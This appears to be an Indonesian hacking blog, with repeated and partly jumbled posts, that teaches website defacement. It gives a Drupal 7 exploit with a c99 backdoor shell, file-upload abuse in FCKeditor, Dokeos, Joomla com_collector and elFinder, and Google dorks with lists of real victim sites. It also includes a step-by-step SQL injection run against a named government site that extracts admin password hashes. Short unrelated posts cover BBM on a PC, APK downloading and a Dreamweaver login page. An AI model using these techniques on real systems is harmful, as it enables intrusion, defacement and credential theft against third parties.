Cara deface dengan Exploit Drupal Core 7.x
By : Anak Jadul Ingin PintarAssalamualaikum.... Kali ini A71P akan menerangkan cara deface site yang menggunakan CMS Drupal 7.x..
Siapkan bahan-bahannya:
1. Drupal Exploiter (Download)
2. C99 Shell (Download)
-------------------
1. Simpan tools exploit diatas dengan ekstensi php dan simpan di hostingan atau di localhost.
1. Google dork;
user : fuckyou
pass : admin
4. Lalu masuk ke http://site.com/node/add/article
( masukkan source backdoor nya dan Ubah format nya ke PHP Code )
lalu scroll kebawah dan klik Save
Dan anda akan langsung di direct ke shell anda
Titip Nama: Muslim Corporation Cyber # A71P Team # Hidden School Hacker # IFC # TK7 Ippi Team :D :D
Siapkan bahan-bahannya:
1. Drupal Exploiter (Download)
2. C99 Shell (Download)
Biasanya akan berhasil jika menggunakan shell c99Langkah-Langkah
-------------------
1. Simpan tools exploit diatas dengan ekstensi php dan simpan di hostingan atau di localhost.
1. Google dork;
intext:"powered by drupal" site:id atau inurl:"node/add/article" site:id2. Masukkan target dan tekan tombol "suck it ! " (jika berhasil penampakannya seperti dibawah ini)
3. Masuk ke url http://site.com/user/login
dan masukkanuser : fuckyou
pass : admin
4. Lalu masuk ke http://site.com/node/add/article
( masukkan source backdoor nya dan Ubah format nya ke PHP Code )
lalu scroll kebawah dan klik Save
Dan anda akan langsung di direct ke shell anda
setelah itu terserah anda..
Tag :
Hacking,
Teknik Remote File Upload Exploit Vulnerability
By : Anak Jadul Ingin PintarNgga ada habis-habisnya kalo ngebahas soal hacking, Setiap hari berbagai macam exploit ditemukan. Dan sekarang saya akan share cara deface website
lagi sob. Tutorial ini saya dapat dari grup facebook Hacker Indonesia.
Namun karena masih banyak yang bingung, disini saya akan jelaskan
beserta gambarnya.
Ok, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut Tutorial Deface dengan Teknik Remote File Upload Exploit Vulnerability :
1). Masukan salah satu dork diatas ke Seacrh Enginee Google.
2). Pilih salah satu website sebagai target.
3). Tampilan Webitenya nanti akan seperti ini.
4). Kemudian kode ini :
5). Ganti dengan kode ini, Lalu enter :
6). Jika sudah, kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.
7). Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.
8). Lalu klik Send it to the Server.
9). Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.
10). Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :
Screenshot :
Sekian postingan saya kali ini tentang Deface dengan Teknik Remote File Upload Exploit Vulnerability, semoga dapat bermanfaat untuk kalian semua.
Credits : Hacker Indonesia
We Are Anonymous !
Ok, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut Tutorial Deface dengan Teknik Remote File Upload Exploit Vulnerability :
Dork :
inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"
1). Masukan salah satu dork diatas ke Seacrh Enginee Google.
2). Pilih salah satu website sebagai target.
3). Tampilan Webitenya nanti akan seperti ini.
4). Kemudian kode ini :
editor/editor/filemanager/browser/mcpuk/images/icons/32/
5). Ganti dengan kode ini, Lalu enter :
editor/editor/filemanager/upload/test.html
6). Jika sudah, kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.
7). Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.
8). Lalu klik Send it to the Server.
9). Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.
10). Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :
http://www.tysk.ee/failid/Image/idulfitri(1).html
http://www.tysk.ee/failid/Image/3xpl0iter.html
Screenshot :
Sekian postingan saya kali ini tentang Deface dengan Teknik Remote File Upload Exploit Vulnerability, semoga dapat bermanfaat untuk kalian semua.
Credits : Hacker Indonesia
Tag :
Hacking,
Hacking Web Sch
By : Anak Jadul Ingin Pintar Anda pasti tau apa itu Hacking website. Ya benar Hacking website adalah
Kegiatan menerobos yang dilakukan seseorang untuk mendapatkan info-info
dari halaman tersebut. Dan yang melakukan Hacking itu disebut Hacker.
Kali ini saya akan membuat sebuah artikel yang tidak jauh dari judul
posting ini. Wah judulnya saja udah menarik bukan. Saya akan memberikan
tutorial seperti judul diatas yaitu 'Cara Hack Website Sekolah (sch.id) Menggunakan Teknik File Upload'
Pada sebuah website sekolah yang akhiran alamatnya (sch.id) masih memiliki sebuah halaman File Upload yang sangat riskan dapat diterobos para Hacker. Nah pada halaman File Upload ini kita memanfaatkan untuk memasukan sebuah file yang kita buat. Sebuah file yang ber-ektensi (.txt .html .php) dll.
Dan saya akan Upload file ke sebuah website ber-ektensi (.txt).
1. Siapkan file .txt terlebih dahulu.
2. Jika file sudah dibuat, langkah selanjutnya adalah memasukkan Dork ke kotak pencarian www.google.com Di bawah ini beberapa dork yang akan kita pakai :
4. Setelah kita memasukkan dork, akan muncul banyak sekali website di pencarian Google. Pilih salah satu website yang akan kita Hack nanti.
5. Setelah memilih salah satu website, kemudian masukan kode di bawah ini setelah akhiran url website.
6. Setelah kita enter akan muncul halaman File Upload.
7. Nah setelah ini, kita akan Upload file yang sudah kita siapkan tadi.
Pada pilihan Asp ganti dengan PHP. Dan pilih telusuri untuk memilih file kita tadi. Kemudian klik Send it to the Server.
8. Jika berhasil akan muncul pesan seperti gambar dibawah ini.
9. Dan kita akan mendapatkan sebuah link hasil Upload kita.
10. Link hasil Upload kita seperti ini. Contoh :
11. Jika link benar dan hasil upload berhasil, akan muncul hasil upload file .txt kita tadi seperti gambar dibawah ini.
12. Selesai.
Cukup mudah bukan tutorial Hack website sekolah teknik file Upload.
Jika masih belum paham,coba dan pahami lagi
nitip nama :./A71P & Big Family Hidden School Hacker
Pada sebuah website sekolah yang akhiran alamatnya (sch.id) masih memiliki sebuah halaman File Upload yang sangat riskan dapat diterobos para Hacker. Nah pada halaman File Upload ini kita memanfaatkan untuk memasukan sebuah file yang kita buat. Sebuah file yang ber-ektensi (.txt .html .php) dll.
Dan saya akan Upload file ke sebuah website ber-ektensi (.txt).
1. Siapkan file .txt terlebih dahulu.
2. Jika file sudah dibuat, langkah selanjutnya adalah memasukkan Dork ke kotak pencarian www.google.com Di bawah ini beberapa dork yang akan kita pakai :
- inurl:/html/siswa.php?
- inurl:/html/alumni.php?
- inurl:/html/guru.php?
4. Setelah kita memasukkan dork, akan muncul banyak sekali website di pencarian Google. Pilih salah satu website yang akan kita Hack nanti.
5. Setelah memilih salah satu website, kemudian masukan kode di bawah ini setelah akhiran url website.
- /editor/filemanager/connectors/uploadtest.html
6. Setelah kita enter akan muncul halaman File Upload.
7. Nah setelah ini, kita akan Upload file yang sudah kita siapkan tadi.
Pada pilihan Asp ganti dengan PHP. Dan pilih telusuri untuk memilih file kita tadi. Kemudian klik Send it to the Server.
8. Jika berhasil akan muncul pesan seperti gambar dibawah ini.
9. Dan kita akan mendapatkan sebuah link hasil Upload kita.
10. Link hasil Upload kita seperti ini. Contoh :
11. Jika link benar dan hasil upload berhasil, akan muncul hasil upload file .txt kita tadi seperti gambar dibawah ini.
12. Selesai.
Cukup mudah bukan tutorial Hack website sekolah teknik file Upload.
Jika masih belum paham,coba dan pahami lagi
nitip nama :./A71P & Big Family Hidden School Hacker
Tag :
Hacking,
Hacking Tecknik Upload
By : Anak Jadul Ingin Pintar
Portail Dokeos vulnerability merupakan bugs upload file yang hampir mirip dengan FCK editor
karena sama-sama bisa kita gunakan untuk upload file deface/shell. Oke
deh langsung aja kita mulai langkah langkahnya, seperti biasa kita googling dulu target kita pake dork dibawah ini:
Name: Portal Dokeos Upload File Vulnerability
Dork: “Portail Dokeos 1.8.5”
Exploit: http://target.com/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Udah siap semua kan langsung kita ke tkp target kita. Jika sudah masuk ke halaman upload dari web target kita ganti dulu pada ‘Select the “File Uploader” to use:’ dari asp kita ubah jadi php. Kalo udah kita langsung upload aja deh itu file deface/shell favorit kita.
Contoh live target :
Setelah berhasil kita upload, kita bisa lihat file upload file deface kita pake url berikut ini:
http://target.com/patch/main/upload/nama_file_anda
Oke deh sekian dulu tutor kali ini, selamat mencoba :-)
Nitip : ./A71P & big family Hidden School Hacker
Tag :
Hacking,
SQL Injection Manual
By : Anak Jadul Ingin PintarPengertian SQL Injection
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter :
id=$id;……. > Got Error
Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.
Contoh :
http://situstarget.com/news.php?id=1’
http://situstarget.com/news.php?id=’1
Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.
Dork SQLi :
Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.
http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]
http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error
Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.
Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.
Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".
contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--
Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.
Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
contoh :
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--
Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabel tbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--
Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--
Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :
user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya silahkan gunakan toolsnya disini. Selanjutnya tinggal mencari halaman logginnya. kalo semua sudah ketemu, tinggal loggin aja, jebreet jebreet jebreet :D
Saya kira hanya begitu saja, kurang lebih mohon maaf.. kalo ada kesalahan mohon diperbaiki :) wassalam :*
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter :
id=$id;……. > Got Error
Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.
Contoh :
http://situstarget.com/news.php?id=1’
http://situstarget.com/news.php?id=’1
Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.
Dork SQLi :
inurl:azerty.php?id= ,Disini saya sudah menemukan targetnya : http://diklat.lampungprov.go.id/more.php?id=1
inurl:bouquin.php?id= ,
inurl:lien.php?id= ,
inurl:clavier.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.
http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]
http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error
Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.
Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.
Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".
contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--
Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.
Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
contoh :
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--
Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabel tbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--
Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--
Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :
user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya silahkan gunakan toolsnya disini. Selanjutnya tinggal mencari halaman logginnya. kalo semua sudah ketemu, tinggal loggin aja, jebreet jebreet jebreet :D
Saya kira hanya begitu saja, kurang lebih mohon maaf.. kalo ada kesalahan mohon diperbaiki :) wassalam :*
Tag :
Hacking,
Coba Dulu Baru Kommen, BBM lewat pc
By : Anak Jadul Ingin PintarSetelah peluncuran bbm for android beberapa waktu lalu, banyak yang
tertarik untuk mencobanya atau malah rela membeli handheld android
terbaru yang ber OS Android 4.0 ke atas (Ice Cream Sandwich dan Jelly
Bean). yang merupakan salah satu sarat OS minimum untuk bisa ber BB ria
melalui android phone.
tapi bagi yang iseng2 pengen mencoba ber BBm-an ria, sekarang tidak perlu membeli handheld android yang harga nya lumayan buat kantong pas-pasan. Cukup manfaatkan PC atau Laptop dirumah untuk di gunakan ber BBm-an ria. Kalau tidak punya PC atau Laptop dirumah ya terpaksa beli hape android, atau bisa pinjam PC di warnet, Lumayan buat sekedar melampiaskan penasaran bagaimana bentuknya BBM di PC/LAPTOP dengan Bluestack
sekedar catatan, cara ini sudah di coba dan berhasil di Laptop asus A42F ber-OS window7 64-bit RAM 6 Gb, dengan mesin Intel(R) Core(TM) i3 CPU M350@2.27GHz
CARA MUDAH BBM di PC/LAPTOP dengan BLUESTACKS, begini caranya:
1. Download bluestacks DISINI untuk online installer nya.
2. Setelah selesai download kemudian install bluestacksnya. Mohon bersabar proses ini memakan waktu cukup lama tergantung koneksi yang dipakai. Kurang lebih satu jam dengan speed rata2 150KB/s.
3. Setelah selesai instalasi. Close saja dulu blustacksnya,
4. Update display adapter driver (optional), lalu restart computer/laptop
5. Download file apk BBM DISINI
6. Setelah selesai download, instal file apk nya.
7. Setelah selesai terinstal, buka bluestacks
8. Klik icon BBm. Silakan login atau create ID baru
9. Selesai CARA MUDAH BBM di PC/LAPTOP dengan BLUESTACKS.
Selamat menikmati BBM-an via pc/laptop
Semoga bermanfaat, BBm dengan CARA MUDAH BBM di PC/LAPTOP dengan BLUESTACKS.
tapi bagi yang iseng2 pengen mencoba ber BBm-an ria, sekarang tidak perlu membeli handheld android yang harga nya lumayan buat kantong pas-pasan. Cukup manfaatkan PC atau Laptop dirumah untuk di gunakan ber BBm-an ria. Kalau tidak punya PC atau Laptop dirumah ya terpaksa beli hape android, atau bisa pinjam PC di warnet, Lumayan buat sekedar melampiaskan penasaran bagaimana bentuknya BBM di PC/LAPTOP dengan Bluestack
sekedar catatan, cara ini sudah di coba dan berhasil di Laptop asus A42F ber-OS window7 64-bit RAM 6 Gb, dengan mesin Intel(R) Core(TM) i3 CPU M350@2.27GHz
CARA MUDAH BBM di PC/LAPTOP dengan BLUESTACKS, begini caranya:
1. Download bluestacks DISINI untuk online installer nya.
2. Setelah selesai download kemudian install bluestacksnya. Mohon bersabar proses ini memakan waktu cukup lama tergantung koneksi yang dipakai. Kurang lebih satu jam dengan speed rata2 150KB/s.
3. Setelah selesai instalasi. Close saja dulu blustacksnya,
4. Update display adapter driver (optional), lalu restart computer/laptop
5. Download file apk BBM DISINI
6. Setelah selesai download, instal file apk nya.
7. Setelah selesai terinstal, buka bluestacks
8. Klik icon BBm. Silakan login atau create ID baru
9. Selesai CARA MUDAH BBM di PC/LAPTOP dengan BLUESTACKS.
Selamat menikmati BBM-an via pc/laptop
Semoga bermanfaat, BBm dengan CARA MUDAH BBM di PC/LAPTOP dengan BLUESTACKS.
Tag :
Tips Dan Trik,
Download Apk Dari Play Store Ke PC/Laptop
By : Anak Jadul Ingin Pintar
Aplikasi Android di kemas kedalam file-file APK. Anda bisa menggunakan aplikasi file managermanapun untuk menyalin file-file ini dari komputer ke perangkat Android dan kemudian menyentuh file .apk untuk memulai install, untuk memasang aplikasi tersebut kedalam smartphone atau tablet Android kamu.
Ada sejumlah alasan kenapa anda ingin download installer APK dari aplikasi Android dari Google Play Store.
Ada sejumlah alasan kenapa anda ingin download installer APK dari aplikasi Android dari Google Play Store.
- Google Play Store mendeteksi bahwa aplikasi atau game yang ingin anda download tidak kompatibel dengan perangkat Android anda, meskipun anda yakin bahwa aplikasi tersebut bisa beroperasi di perangkat anda. Contohnya aplikasi APK BBM untuk Android.
- Terkadang sebuah aplikasi Android bisa jadi tidak tersedia untuk di download di Play Store negara / daerah tempat kamu berdomisili.
- Bisa jadi perangkat anda tidak memiliki Play Store, seperti tablet Amazon Kindle.
- Atau juga perangkat anda terdeteksi palsu oleh Play Store, silahkan cek apakah HP Android anda asli atau replika / palsu.
Untuk memulainya anda cukup memasukan alamat URL web dari aplikasi apapun yang terdaftar dari Google Play Store dan klik tombol Generated Download Link. Aplikasi download APK akan menarik file APK dari Google Play Store dan akan menyimpannya kedalam server mereka dari situ kamu bisa download file-nya.
Keuntungan menggunakan APK Downloader.
Dikarenakan file-file APK tersebut langsung di ambil dari Google Play Store, maka kemungkinan besar aplikasi Android tersebut tidak akan terinfeksi oleh malware.
Dan untuk mencegah masalah hak cipta, APK downloader hanya membolehkan anda untuk download aplikasi dan game gratis dari Google Play Store, bukan aplikasi yang berbayar.
Tentu untuk menggunakan layanan APK Downloader dari Evozi anda tidak perlu terlebih dahuluroot Android anda. Jadi tidak usah khawatir. Cukup memasukan alamat URL dari aplikasi yang ada di Google Play Store yang ingin anda ambil file apk-nya maka beres sudah.
Silahkan ke website APK Downloader miliknya Evozi.
Tag :
android,
cara Deface dengan mudah memanfaatkan Bugs pada shell Upload.
By : Anak Jadul Ingin Pintar
Jika anda ingin melakukan aksi Deface dengan sangat mudah, disini
saya akan mengeshare bagaimana cara Deface dengan mudah memanfaatkan
Bugs pada shell Upload.
POC/Exploit: http://localhost/e-diary/makehtml/fileupload.php
Demo:
- http://www.old.crcn.in.th/e-diary/makeht…upload.php
- http://www.ped.si.mahidol.ac.th/e-diary/…upload.php
POC/Exploit : http://localhost/[path]/index.php?option=com_collector&view=filelist&tmpl= component&folder=&type=1
Demo :
http://www.immortal-thor.com//index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
http://belmuzfond.com/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
http://www.volontarimini.it/volontarimini2012/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
http://www.moepooladfar.org/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
“Powered By Uber Uploader”
allinurl: uu_file_upload.php
allinurl: uber_uploader_file.php
POC : http://[localhost]/uploads/file kamu
Demo :
http://tv.fuerzw.de/upload/uu_file_upload.php
http://www.cptmkt.com/uu_file_upload.php
intitle:index of
POC: http://localhost/Patch/elfinder/elfinder.php.html or elfinder.php
1. Shell Upload “template.php?component=”
Dork: inurl:mdbtemplate/mytemplatePOC/Exploit: http://localhost/e-diary/makehtml/fileupload.php
Demo:
- http://www.old.crcn.in.th/e-diary/makeht…upload.php
- http://www.ped.si.mahidol.ac.th/e-diary/…upload.php
2. Joomla com_collector upload shell
Dork : inurl:index.php?option=com_collectorPOC/Exploit : http://localhost/[path]/index.php?option=com_collector&view=filelist&tmpl= component&folder=&type=1
Demo :
http://www.getravel.gr/site/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
http://www.immortal-thor.com//index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
http://belmuzfond.com/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
http://www.volontarimini.it/volontarimini2012/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
http://www.moepooladfar.org/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
3. Uber Uploader 5.3.6 Vuln Upload
Dork:“Powered By Uber Uploader”
allinurl: uu_file_upload.php
allinurl: uber_uploader_file.php
POC : http://[localhost]/uploads/file kamu
Demo :
http://tv.fuerzw.de/upload/uu_file_upload.php
http://www.cptmkt.com/uu_file_upload.php
4. elFinder Shell Upload Vulnerability
DORK: inurl:/elfinder/intitle:index of
POC: http://localhost/Patch/elfinder/elfinder.php.html or elfinder.php
Tag :
Hacking,
Membuat CMS PHP MySQL (Part 3)
By : Anak Jadul Ingin PintarMelindungi halaman admin dengan Username dan Password
Halaman website yang tersimpan dalam folder admin sifatnya adalah rahasia. Semua halaman hanya dapat diakses jika seseorang telah melakukan login dengan username dan password. Oleh karena itu Anda harus melindungi halaman-halaman admin tersebut.Setiap aktivitas membuka file di halaman admin yang tanpa melalui login dengan username dan password yang benar, maka Anda akan dialihkan ke halaman login. Berikut langkah-langkahnya:
- Buka file admin.php dengan Dreamweaver Anda
- Klik Insert > Data Objects > User Authentication > Restric Access To Page. Jendela ini akan keluar, lakukan beberapa setingan berikut ini
- Restric based on: Username and Password
- If access denied, go to: login.php. Klik Browse lalu pilih file login.php. Ini artinya ketika halaman admin.php ingin Anda buka dan Anda belum melakukan login dengan username dan password yang benar, maka Anda akan dialihkan ke halaman login.php.
- Klik OK untuk menyelesaikannya. Lalu simpan hasil pekerjaan Anda
Menambahkan dan mengaktifkan link Log Out
Langkah selanjutnya adalah mengaktifkan link Log Out yang ada di halaman admin.php. Berikut adalah langkah-langkahnya.- Buka file admin.php
- Cari dan seleksi (blok) tulisan Log Out yang berada di sudut kiri bawah sidebar halaman website Anda. Gunakan Design View untuk melakukannya. Di sana Anda akan menemukan tulisan Log Out dengan gambar merah beserta link berisi tanda kres (#).
- Klik Insert > Data Objects > User Authentication > Log Out User. Jendela Log Out User akan keluar lalu lakukan konfigurasi.
- Log Out when: Link Clicked
- When done, go to: login.php. Klik Browse lalu cari file login.php, ini artinya ketika proses Log Out berhasil dilakukan Anda akan dialihkan ke halaman login.php
- Klik OK untuk menyelesaiaknnya. Simpan kembali file Anda.
Membuat halaman login (login.php)
Anda telah berhasil melindungi semua halaman website yang tersimpan dalam folder admin dengan username dan password (kecuali halaman login.php). Langkah selanjutnya Anda akan membuat halaman login dan mengaktifkannya. Bagian ini akan terdiri dari dua tahap, yaitu:- Membuat form login
- Mengaktifkan form login
Membuat form login:
- Buka halaman login.php melalui Dreamweaver Anda.
- Di sana Anda akan menemukan tulisan “Form login di sini”. Hapus tulisan tersebut, di sana Anda akan membuat form login tersebut
- Klik Insert > Form > Form
- Klik Insert > Spry > Spry Validation Text Field. Jendela Input Tag akan muncul, lalu isi dengan data berikut ini.
- ID: username, lalu Label: Username:<br>. Lalu klik OK. Letakkan kursor Anda setelah text field, lalu tekan ENTER
- Klik Insert > Spry > Spry Validation Password. Jendela Input Tag akan keluar. Lakukan konfigurasi berikut ini
- ID: password, lalu Label: Password:<br>. Klik OK, letakkan kursor Anda setelah password field, tekan ENTER
- Klik Insert > Form > Button
